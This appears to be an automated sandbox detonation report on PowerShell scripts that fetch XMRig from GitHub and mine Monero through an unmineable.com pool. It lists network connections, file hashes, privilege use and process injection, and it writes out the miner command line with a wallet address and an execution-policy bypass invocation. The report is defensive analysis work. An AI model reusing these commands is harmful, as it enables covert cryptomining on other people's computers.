powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.193.132.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
Files
memory/4512-3-0x00007FF9BAE73000-0x00007FF9BAE74000-memory.dmp
memory/4512-6-0x00007FF9BAE70000-0x00007FF9BB85C000-memory.dmp
memory/4512-5-0x0000017665780000-0x00000176657A2000-memory.dmp
memory/4512-9-0x00007FF9BAE70000-0x00007FF9BB85C000-memory.dmp
memory/4512-10-0x000001767DF30000-0x000001767DFA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rv1hpey3.hp1.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4512-25-0x00007FF9BAE70000-0x00007FF9BB85C000-memory.dmp
memory/4512-48-0x00000176657B0000-0x00000176657C2000-memory.dmp
memory/4512-61-0x0000017665760000-0x000001766576A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/648-90-0x0000018C599A0000-0x0000018C599C0000-memory.dmp
memory/648-91-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/4512-92-0x00007FF9BAE70000-0x00007FF9BB85C000-memory.dmp
memory/4512-94-0x00007FF9BAE73000-0x00007FF9BAE74000-memory.dmp
memory/648-93-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/4512-95-0x00007FF9BAE70000-0x00007FF9BB85C000-memory.dmp
memory/648-96 through memory/648-156: 0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp (61 consecutive dumps of the same region)
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:38
Platform
win11-20240426-en
Max time kernel
1798s
Max time network
1743s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4468 wrote to memory of 1060 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4468 wrote to memory of 1060 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| IE | 52.111.236.21:443 | N/A | tcp |
Files
memory/4468-0-0x00007FFA23E73000-0x00007FFA23E75000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2jzigi0y.ggf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4468-9-0x0000020F74340000-0x0000020F74362000-memory.dmp
memory/4468-10-0x00007FFA23E70000-0x00007FFA24932000-memory.dmp
memory/4468-11-0x00007FFA23E70000-0x00007FFA24932000-memory.dmp
memory/4468-12-0x00007FFA23E70000-0x00007FFA24932000-memory.dmp
memory/4468-14-0x0000020F743D0000-0x0000020F743E2000-memory.dmp
memory/4468-15-0x0000020F743B0000-0x0000020F743BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1060-46-0x000001F9BE5C0000-0x000001F9BE5E0000-memory.dmp
memory/1060-47-0x000001F9BE600000-0x000001F9BE620000-memory.dmp
memory/1060-48-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/4468-49-0x00007FFA23E70000-0x00007FFA24932000-memory.dmp
memory/1060-51-0x000001F9BFEE0000-0x000001F9BFF00000-memory.dmp
memory/1060-50-0x000001F9BFF00000-0x000001F9BFF20000-memory.dmp
memory/4468-53-0x00007FFA23E73000-0x00007FFA23E75000-memory.dmp
memory/1060-52-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-54-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-55-0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp
memory/1060-57-0x000001F9BFEE0000-0x000001F9BFF00000-memory.dmp
memory/1060-56-0x000001F9BFF00000-0x000001F9BFF20000-memory.dmp
memory/1060-58 through memory/1060-116: 0x00007FF7BC3B0000-0x00007FF7BCFE3000-memory.dmp (59 consecutive dumps of the same region)
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:39
Platform
win7-20240221-en
Max time kernel
1563s
Max time network
1564s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
Network
Files
memory/2756-4-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp
memory/2756-5-0x000000001B720000-0x000000001BA02000-memory.dmp
memory/2756-6-0x00000000028F0000-0x00000000028F8000-memory.dmp
memory/2756-7 through memory/2756-11: 0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp (5 consecutive dumps of the same region)
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:41
Platform
win10-20240404-en
Max time kernel
1792s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4748 wrote to memory of 5080 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4748 wrote to memory of 5080 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aqb4bwfg.ifi.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:40
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4536 wrote to memory of 4272 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4536 wrote to memory of 4272 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.201.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c5wziq0n.oaj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:31
Platform
win10-20240404-en
Max time kernel
1795s
Max time network
1773s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4760 wrote to memory of 620 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4760 wrote to memory of 620 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t50wrzui.ysu.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:37
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5044 wrote to memory of 2020 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5044 wrote to memory of 2020 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 52.111.227.14:443 | | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ati2gfja.d3q.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
